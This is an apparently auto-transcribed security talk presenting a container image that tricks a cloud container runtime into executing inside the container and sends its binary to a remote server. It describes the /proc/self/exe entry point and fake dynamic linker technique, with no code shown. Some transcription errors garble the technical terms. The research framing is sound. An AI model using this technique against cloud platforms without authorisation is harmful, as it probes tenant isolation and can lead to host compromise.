 Thanks, thanks, and thanks everyone for joining. I am Yovail Avraami, I'm a security researcher at Palo Alto Networks. We're with me and the rest of my team. We're looking to the security of the Cloud and containers specifically. I'm very excited today to be presenting your CUSY, which is a tool I wrote. It's actually a container image that can be used to look under the hood of container as a service platform. Let's start off by going over the agenda. So we'll start off by talking about what our container as a service platform are and why are they interesting. We'll then talk about CUSY, what it does and how it does it. Then I'll show a quick demo. We'll go over into the low levels of the implementations. And finally, I'll discuss some of the findings that I was able to see with CUSY and we'll wrap it up with some questions. So let's start with containers as a service. So you probably heard about some of the containers as a service platforms out there. You have AWS Fargate, Azure Container Instances, Google Cloud Run and more recently IBM Code Engine. And those platforms are really a way to run serverless containers. They're a way for you to take a container, just upload it to the cloud and have it process events, scale up and scale down according to demand. And it's really a way to run your services without managing or worrying about the underlying infrastructure, managing the underlying servers or managing the underlying nodes, which is a really great way to improve your ease of use of those platforms. But on the other hand, without management, you really have no visibility into how your containers run on the cloud. And that brings the question, can you really trust container as a service platforms with your containers? So what could be an issue? Well, container as a service platform like every public cloud offering runs your workloads alongside other customers workloads, right? So you need to trust the platform to segregate your workloads from other customers workloads because there may be a malicious customer. But with container as a service offerings, you really have almost no visibility into how your container run. You just upload your container image. It receives some HTTP endpoint. But beside that, you don't know how is the cloud provider protecting your workloads. And that's really what Houssi tries to do. So the motivation is really to gain visibility into how container as a service platforms run our container. And the way Houssi does it, it's really a container image that upon execution, exfiltrates the underlying host container runtime to a remote server. And it actually sends the actual binary. And you might see something pretty interesting that you have a container that reads a file from the host, the container runtime. So we'll get to how Houssi does that in just a bit. But let's start off by seeing a demo. So what I have here is a file server that will receive the runtime. And I'm going to use IBM code engine, which is a class platform. So first, I'm creating a job template. And it uses the Houssi container image as you can see. And now I'm going to deploy the Houssi container to IBM cloud and have it run it in the container as a service platform. So this is a live demo. So hopefully it will work. OK, so the container is just now uploaded. And you can see that the file server received some file. And it will just wait, oh, it finished. And if we take a look at the file that we got, we can see that we got Ransi, which is the industry standard container runtime. So this is the version that is used in IBM code engine. And that's the actual binary. You can see that it's a go binary, so it's pretty large. So that's very, very cool, in my opinion at least. And let's continue and talk about what we expect to find with this tool just before we talk about the implementation. So like we saw with IBM code engine, we can expect a lot of Ransi. Ransi is the industry standard container runtime. So we can expect to see a lot of it. We might see some old and vulnerable Ransi version. We might see some custom changes that Cloud Provider made to vanilla Ransi. And we might even see other runtimes, maybe proprietary runtimes. You really can know. And let's continue to talk about who's implemented. So who's basically follows two steps. The first step is to trick the runtime to execute itself inside the container. And the second step is to have someone in the container read the runtime binary from PROC PID Exa and send it to a remote server. So if that sounds a little complex right now, let's break it down step by step. So the first step is to trick the runtime into executing itself inside the container. So how do we do it? Well, it's pretty simple. That's the Docker file of the container image. All we do is set the entry point to slash PROC slash self slash Exa. And slash PROC slash self Exa is a unique magic link in Linux. So whatever process acts as that path, we will actually see a link to the binary that is running. So you can see in the image below, when a less tries to access PROC self Exa, he sees that PROC self Exa points to a less. But when the read link binary tries to access PROC self Exa, PROC self Exa points to read link. So when we tell the runtime to please execute PROC self Exa as the container entry point, we actually make it execute itself inside our container. So that's the first step, right? We have a way to trick the runtime into to execute itself inside the container. And the second step is to have someone in the container read that process, that runtime process, PROC PID Exa and send it to a remote server. So that's how it looks, right? We have the runtime, we tricked it to execute itself inside the container. Then our process inside the container reads the runtime executable through PROC slash runtime PID slash Exa and sends it to our remote server, right? So it's actually not that simple because containers can only have one entry point that are made to run one process. So if we set the entry point to PROC self Exa and make the runtime execute itself inside the container, we really have no way to spawn our process that is supposed to send the runtime, right? We have no way to spawn the red process in this image. So how can we overcome this? Well, the solution is to actually replace the dynamic linker inside the container image. So we assume the runtime is dynamically linked and in Linux when a dynamically linked executable starts running, the kernel loads the dynamic linker to the process memory of the dynamically linked executable and transfers execution to the dynamic linker so the dynamic linker can load the necessary libraries that the process needs. So the kernel actually searches for the dynamic linker from the, in the root file system of the process. And because we tricked the runtime to run inside our container, it will actually look take the containers dynamic linker. So in order to make this happen, we actually only add one line to the Docker file. And that's the second line here we take, we create a fake dynamic linker and use it and replace the dynamic linker in the container with it. So that's actually a pretty nice trick but we need to a way to actually create a dynamic linker. And when I was approaching this test, I really had no idea how to do that. So as we've said, the kernel loads dynamic linker to process memory to load shared libraries, right? So first of all, the dynamic linker the dynamic linker must be statically linked, right? It cannot have dependencies on other libraries because the dynamic linker is the one that is responsible for loading libraries. Second of all, it needs to be written in C or maybe CPP, I haven't tried CPP because languages with complex runtimes like Golang, they don't expect to run in the context which the dynamic linker runs. So they can cause some issues. And at my first try, I tried compiling with a G-Lipsy and it turns out that a feature of G-Lipsy called Fred local storage actually causes some problem but if you compile with muscle, Lipsy, then everything works fine. So that's how I created my custom dynamic linker and to wrap things up, that's how the demo we saw worked. So IBM cloud took our HUSI image, the entry point was set to slash proc slash self slash exit and when the container was run, our fake dynamic linker was loaded to the runtime process and sent the runtime binary to our remote server. So we have a way to read the binary, the container runtime binary from the host but there is also an assumption in this way which is that the runtime is dynamically linked because if the runtime is statically linked, the linker is loaded into the memory because it isn't needed. So in this scenario, we need some way to have someone in the container, read the runtime and send it to us. So actually gave this some thought and eventually the solution I came up with is to read the runtime whenever there is an exit like a docker exit or kubectl exit, if you're familiar with it, whenever there's an exit into the HUSI container, this flavor of HUSI will send the runtime and most containers as a service platforms, they support a docker exit like experience to the uploaded container. So if it's really not clear yet, let's see the docker file. So we now have our binary just run at the entry point. We have a binary that knows how to upload the runtime and when we run the container, that's what you have, right? They're just a process running inside the HUSI container, but then when someone docker exit inside the container, we actually ask it to exit slash proc slash shell slash exit, which makes the runtime process appear inside the container, right? We trick it to execute itself inside the container and then our upload runtime, which runs as KID one waits for the runtime to jump in and whenever it jumps in, it sends it to remote server. So let's see a demo. So first off, we need a file server, right? And because the file server runs on our local machine, we need to see how docker container see the IP of the local machine and that's really the IP of the default gateway. So I'm just gonna grab that. And now we're going to run our container and that's the IP that you can see that we earlier saw is the IP of the host from the context of the container. So you can see this is the wait for exit flavor of HUSI and HUSI now waits, runs as the PID one of the container and waits for the runtime to execute. So that's what we're gonna do and the name of the container, oops, sorry. And we're gonna ask you to execute ProgServeExam and you can see that HUSI notice the runtime executing into the container and uploaded the runtime over here to the file server. And if you try to see what file we actually got, we can see that again, it's the runtime of the underlying host which also in my Linux VM is run C. So that's how you solve static, that's how I solve a statically linked front-times having a process in the container wait for docker exit into the container. And that's really how HUSI is implemented. You have this flavor which is for statically linked front-time and you have the dynamic linker flavor which is for dynamically linked front-times. And when I took HUSI to a real container as a service platform, I actually saw both. I saw a dynamically linked front-time and I also saw a statically linked front-time. So with that, let's talk about the finding so far. So as I expected in the beginning, I saw a lot, a lot of run C which is the really the industry standard container runtime. But I also saw old and vulnerable run C versions which led to some quite interesting research that they yet can't disclose. Well, what about custom changes to vanilla run C? Well, I really haven't had the time to take a deeper look into that but for my shell or look, I didn't see any custom changes but I'm not like I haven't looked into that to the fullest because I was more preoccupied with vulnerable run C versions. And finally, I didn't see any other runtime other than run C. So what's next? Well, you can use HUSI to poke at the underlying container runtime of whatever container as a service platforms you lack. You can get visibility into how your containers run on the platform. And maybe you'll find some security issue with the runtime and possibly get the bounty and help harden a container as a service platforms. So right after this talk, I'm gonna make this link publicly accessible and I think I'm ready for questions.